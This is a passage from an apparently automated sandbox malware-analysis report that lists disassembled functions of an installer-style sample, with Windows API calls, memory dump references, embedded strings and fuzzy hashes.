                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                        Non-executed Functions

                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                        Strings
                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                        • String ID: created uninstaller: %d, "%s"
                                                        • API String ID: 3294113728-3145124454
                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                        • GetMessagePos.USER32 ref: 0040489D
                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                        • MulDiv.KERNEL32(00013C00,00000064,0013DC3A), ref: 00403295
                                                        • wsprintfW.USER32 ref: 004032A5
                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: *?|<>/":
                                                        • API String ID: 589700163-165019052
                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                        • String ID: CopyFiles "%s"->"%s"
                                                        • API String ID: 2577523808-3778932970
                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: lstrcatwsprintf
                                                        • String ID: %02x%c$...
                                                        • API String ID: 3065427908-1057055748
                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                        • API String ID: 2266616436-4211696005
                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                        Strings
                                                        • Error launching installer, xrefs: 00405C74
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
